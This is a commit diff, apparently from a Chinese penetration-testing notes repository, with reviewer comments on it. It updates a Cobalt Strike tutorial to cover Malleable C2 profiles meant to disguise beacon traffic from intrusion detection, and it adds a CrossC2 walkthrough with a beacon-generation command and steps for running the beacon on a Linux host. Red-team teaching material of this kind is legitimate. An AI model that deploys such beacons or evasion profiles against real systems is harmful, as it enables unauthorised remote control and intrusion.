Commit

updated-20240215
xf555er committed Feb 15, 2024
1 parent fa6e998 commit f9475e7
Showing 111 changed files with 3,142 additions and 15 deletions.
Empty file added C2Sharp开发.md
113 changes: 106 additions & 7 deletions CobaltStrike的使用教程.md
Expand Up @@ -89,7 +89,7 @@ Cobalt Strike 一款GUI的框架式渗透工具,集成了端口转发、服务

为新建的区域增添A记录, 如下图所示步骤依次添加CS服务器及代理服务器

- CS服务器: 别名为`team`, ip地址为`192.168.47.134`
- CS服务器: 别名为`CS`, ip地址为`192.168.47.134`

- 代理服务器1: 别名为`proxy1`, ip地址为`192.168.47.131`
- 代理服务器2: 别名为`proxy2`, ip地址为`192.168.47.140`
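Review bot: renaming the CS server alias from `team` to `CS` on this one bullet leaves every other reference to the old `team` name (the A-record figure this bullet describes, any listener or redirector hostname later in the tutorial) unchanged; check those spots and update them in the same commit, otherwise the DNS walkthrough and the screenshots stop agreeing with the text.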
Expand Down Expand Up @@ -1196,9 +1196,9 @@ Cobalt Strike 是一个流行的渗透测试工具,主要用于模拟高级持

列出指定主机名的共享列表: `net share \\[主机名]`

![image-20221011000036372](CobaltStrike的使用教程/image-20221011000036372.png)

![image-20221011000036372](CobaltStrike的使用教程/image-20221011000036372.png)


## 获取域内用户和管理员信息

Expand Down Expand Up @@ -1306,10 +1306,10 @@ profile文件编写完成后,可使用CobaltStrike自带的c2lint来验证prof

### 3.加载Profile文件

在启动Cobalt Strike team server时,需要指定使用的Malleable C2 profile文件。可以在命令行中使用`-profiles`参数来指定文件路径,如下所示:
在启动Cobalt Strike team server时,可执行如下命令指定Malleable C2 profile文件

```
./teamserver [yourip] [password] -profiles myprofile.profile
./teamserver [yourip] [password] ./myprofile.profile
```

其中,[yourip][password]是你的C2服务器的IP地址和密码,myprofile.profile是你的Malleable C2 profile文件的路径
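Review bot: the rewritten sentence before the code block no longer explains why `-profiles` disappeared; it should say that the profile is passed as the optional third positional argument (`./teamserver <host> <password> [/path/to/c2.profile]`), so readers who saw `-profiles` in older material understand the new form is the correct one rather than a typo. The unchanged explanatory line after the block also needs a separator between `[yourip]` and `[password]` and a closing period, and the fence would read better with a `bash` language tag.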
Expand Down Expand Up @@ -1400,6 +1400,8 @@ server {

### http-get

这部分配置信标发送到服务器的 HTTP GET 请求。这通常用于信标的 "check-in" 操作,即信标定期联系服务器以获取指令。`http-get` 配置可以包括请求的URI、请求头、请求参数等,以及服务器响应中应该包含的数据。这使得通信看起来像是正常的网络流量,帮助信标躲避入侵检测系统的侦测

如下代码定义了CS的HTTP GET请求的配置,分为两部分,`client`部分描述了Beacon发出的请求,`server`部分描述了C2服务器的响应

`metadata`块中,`base64url`表示Beacon将元数据进行Base64编码;`prepend "__cfduid="`表示在编码后的元数据前添加字符串`"__cfduid="``header "Cookie";`表示将元数据放入"Cookie"头部字段发送
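Review bot: the added http-get paragraph ends without terminal punctuation (…入侵检测系统的侦测), and its claim that the block makes traffic "look like normal traffic" and evade IDS is left unsupported; tie it to the concrete mechanism shown two lines below (metadata base64url-encoded, prefixed with `__cfduid=`, and carried in the `Cookie` header), and note that fixed strings like that prefix are exactly what a detection signature can match on, so the profile only blends in as well as those values are chosen. The context line below also runs `"__cfduid="` directly into `header "Cookie";` with no separator; worth fixing while touching this area.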
Expand Down Expand Up @@ -1451,6 +1453,8 @@ http-get {

### http-post

这部分配置信标发送到服务器的 HTTP POST 请求。信标使用 POST 请求来发送数据回 C2 服务器,例如搜集到的信息、命令执行结果等

与http-get不同的是,http-post多了个id参数,id部分定义了如何传输session id

session id是CS用来标识不同的beacon实例的唯一标识符。为了与C2服务器进行有效通信,每个Beacon必须在其请求中包含这个标识符,以便C2服务器可以识别和处理每个请求。例如,如果session id是1234,那么Beacon发送的POST请求uri会是`/submit.php?id=1234`
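Review bot: the new http-post paragraph also lacks a closing period, and it should lead into the `id` discussion that follows rather than stop at "command results": one clause saying that the `id` block defines how the session id is transported is enough for the reader to connect it to the `/submit.php?id=1234` example two lines later.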
Expand Down Expand Up @@ -1820,8 +1824,6 @@ post-ex {





# 十一、bof开发

## 前言
Expand Down Expand Up @@ -3014,6 +3016,103 @@ void go(char* buff, int len) {



# 十四、Cross2 Linux Shell

## 前言

CobaltStrike本身并不支持生成linux类型的payload,此处我们需要借用[CrossC2](https://github.com/gloxec/CrossC2)插件来生成,此插件目前仅支持HTTPS监听

我们可以在不同平台下使用CrossC2来生成payload

![image-20231214165312243](CobaltStrike的使用教程/image-20231214165312243.png)



## 步骤演示

### 1.下载CrossC2

此处我以在windows平台生成payload为例,首先在CobaltStrike目录新建一个CrossC2目录,并将`.cobaltstrike.beacon_keys`和CrossC2插件放进去,再将`genCrossC2.Win.zip`的文件解压至此目录

![image-20231214165932408](CobaltStrike的使用教程/image-20231214165932408.png)



### 2.修改插件并加载

修改`CrossC2.cna`的内容,将`$CC2_PATH`的值修改为CrossC2的根目录

```
$CC2_PATH = "E:\\HackerTools\\IntranetPenetration\\CobaltStrike\\CobaltStrike4.9\\CrossC2\\"; # <-------- fix
$CC2_BIN = "genCrossC2.exe";
```



在CobaltStrike客户端加载CrossC2插件

<img src="CobaltStrike的使用教程/image-20231214170437779.png" alt="image-20231214170437779" style="zoom:67%;" />



### 3.创建HTTPS监听

创建一个HTTPS类型的监听

<img src="CobaltStrike的使用教程/image-20231214170553405.png" alt="image-20231214170553405" style="zoom: 80%;" />



点击右上角的CrossC2插件,创建一个反向HTTPS监听

![image-20231214170655371](CobaltStrike的使用教程/image-20231214170655371.png)



Listener要选择之前创建的HTTPS监听;由于我teamserver启动时指定了profile文件,因此此处也需指定;CS版本虽然只有小于或等于4.8的版本可选择,但是实测4.9也是可以用的

![image-20231214172041962](CobaltStrike的使用教程/image-20231214172041962.png)



### 4.生成payload

点击build后会在CobaltStrike根目录下生成一个`beacon.out`

<img src="CobaltStrike的使用教程/image-20231214172410952.png" alt="image-20231214172410952" style="zoom:67%;" />



除了在插件生成payload, 还可以在linux或windows使用命令行来生成, Linux的这里就不演示了,命令行格式为如下所示:

```
genCrossC2 <listener-ip/domain> <listener-port> <beacon_keys> <rebind_library;config.ini;c2profile.profile> <target_platform> <target_arch> <output_file>
```

如下例子所示:

```
genCrossC2.exe 192.168.47.188 443 .cobaltstrike.beacon_keys ";;henry.profile" Linux x64 beacon.out
```

![image-20231214204548405](CobaltStrike的使用教程/image-20231214204548405.png)



### 5.执行payload

将生成的beacon.out上传至linux主机并赋予可执行权限, 随后执行

![image-20231214172744322](CobaltStrike的使用教程/image-20231214172744322.png)



beacon执行后,CobaltStrike显示目标主机上线

![image-20231214173111039](CobaltStrike的使用教程/image-20231214173111039.png)


# vps搭建可能遇到的问题

## 1.文件上传
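Review bot: step 1 (下载CrossC2) tells the reader to copy `.cobaltstrike.beacon_keys` into the new CrossC2 directory without saying what that file is; it is the team server's key material, so the section should name it as such and tell readers to keep it out of version control, shared folders and screenshots. The new section heading reads `Cross2 Linux Shell` while every other mention uses the plugin's name CrossC2. The generic command line documents a three-field `<rebind_library;config.ini;c2profile.profile>` argument, but the worked example passes `";;henry.profile"` with no sentence explaining that the two empty fields mean no rebind library and no config.ini; add that. The `$CC2_PATH` snippet hard-codes an author-specific `E:\\HackerTools\\...` path marked `# <-------- fix`; say explicitly that the reader replaces it with their own CrossC2 directory. Step 3 asserts that 4.9 works although the dropdown stops at 4.8; name the CrossC2 release this was tested with so the claim can be re-checked when either tool updates. Finally, the three code fences have no language tag, and the example listener address `192.168.47.188` differs from the `192.168.47.134` CS server used earlier in this file; confirm that is intentional.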
4 changes: 2 additions & 2 deletions 内网横向移动.md
Expand Up @@ -139,7 +139,7 @@ net use \\<目标ip>\ipc$ /user:<用户名> <用户密码>

![image-20230829215830233](内网横向移动/image-20230829215830233.png)



执行如下命令查看计算机当前的网络连接

Expand Down Expand Up @@ -437,7 +437,7 @@ goldenPac.exe <域名>/<域用户名>:<域用户明文密码>@<域控完整域

![image-20230902110603664](内网横向移动/image-20230902110603664.png)



# Psexec

4 changes: 1 addition & 3 deletions 内网渗透基础.md
Expand Up @@ -306,7 +306,7 @@ SAM文件位于 `%SystemRoot%\system32\config\` 目录下,负责存储本地



### LM和NTML哈希是什么
### LM和NTLM哈希是什么

Windows操作系统使用两种方法来对用户明文密码进行加密处理,这两种方法分别是LM Hash和NTLM Hash。在域环境中,用户信息存储在`ntds.dit`文件中,并且密码以散列值的形式加密。Windows操作系统中的密码通常由LM Hash和NTLM Hash两部分组成,它们的结构通常如下所示:

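Review bot: the `NTML` to `NTLM` heading correction is right, but changing heading text also changes the auto-generated anchor, so any in-document table of contents entry or cross-file link that pointed at the old heading needs the same fix in this commit.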
Expand Down Expand Up @@ -715,8 +715,6 @@ kerberos协议中也存在三个角色,分别是

![image-20230607233340578](内网渗透基础/image-20230607233340578.png)




### 白银票据

0 comments on commit f9475e7
